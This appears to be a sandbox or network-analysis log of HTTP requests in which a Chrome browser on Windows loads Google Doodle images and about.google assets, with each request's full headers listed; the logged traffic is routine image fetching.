    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-icons.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: imageReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2023/tunisia-national-day-2023-6753651837109852-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2023/sapardi-djoko-damonos-83rd-birthday-6753651837110031-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2022/nowruz-2022-6753651837109194.2-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2022/tunisia-national-day-2022-6753651837109600-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/tunisia-national-day-2021-6753651837108892-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/spring-2021-northern-hemisphere-6753651837108891-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /jcu0uhAhK_fAiuPSrVmgIQxcwSxkTkHtGP4XRFhnh497_XGtN_KEA_0eCFdxXHxkMfWUk9uXhMkQBd_GImeJd7Tna6dRuRTTYpFCPSpzJ9Lhpp0egzQ=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /hyqlKj6FYj8yAzPaJZB7cfknhp-7J4SY9rv3NRrQi7ox0HJiZKzUyqKGg6x7xXGmAO_ALYY2Ud--hoKC0sKY51sDCTu6yOMz-3TkpmQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /4OMr0tkN-puVthzh9N6e028DIaYljPtm3HD-WZXJ7i1PijG206V92KtvEIUytIinK9qAhGQPWxlt80Sx8mtoT_XrLrfBwJPlQVRn7Vxnv7hGFPJ8wZ1t=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/fall-2021-southern-hemisphere-6753651837108888-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /WsTh371vqLlKjqDM-BIB6lrZvkq6LeGcGgZA-Gdh57kK2G8Tt9EY3gFCQ5SRm-Wl9HrdAE83S-LH2uLsl4c1tEmqccdISKm7DzG4VOihfg=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jptdNkprZQo-Qp7UYK4_eMxLzzXWgTIJsIKCVg2Um9jDxtiu0FAPqLkTXl5ZQvgfHNaZliSPsrrtY6tXAB7tb-gwsF9-vs_natxpaLNVCw=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/nowruz-2021-6753651837108889-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /MUNO7NmgAs09RF0_Q4omjTtH7Fv6N6CpsLWNeZUIekGIwpadAooelENCI4enC02_j7yRtxhs5sUZaoGJ67dmrYie4nGDHHHQYF1poqHqNQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/david-warrens-95th-birthday-6753651837108320-2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2020/tunisia-national-day-2020-6753651837108322-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2020/recognizing-ignaz-semmelweis-and-handwashing-6753651837108746.2-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /Bo4-9K6wiEyWZr1x4IfvOeB_NFv8MGC8kqmS--hCUaR0B0puSgikWbDppKEeYSd2bxdhPT9wfcSPdX35aIjShic_UaI8AnK9kUrE1ZVWlg=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/netherlands-elections-2019-5158774833676288-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /2qXSisrJyDKIya5ouYiCtVAEdZdM2HfTjduDaAVsk-v_SeZtoIZnu79Ol1xz14NfzU2xqV0PIX13I_sx5GQ4gdGyIsKhsgMazdk-2tQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /effFMzq4XvfrZPK0E_tvDivy7b-Kd2-Cmd8TvA-maCZK35whczbTdegzCTQBeA46bhHMIy0Eujntwy2v9vqSBDu-_nT-8eZJerDmkwpV=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /hXMSnnnK17inbOjeyLqFBx3HrKFKdAJlO0cuhNdwe3Yz0O4axkn9ULNFcaEi_zbL_oKUs3VvZM6sAVUB_-gwzDrLwN-ahxnefG0IYhA=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /olVhV9gmfm07h0ru15ZgIm_kj58lRl3-RqqhYS1pqIEmSscfm8zYw5jxXWF9D4VSXBvVj5SBgeq_ohAvAl5d7UvUYMBvynL_3s50N_4mKg=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/nowruz-2019-6284808622702592-2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/gamila-el-alailys-112th-birthday-6036329396699136-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
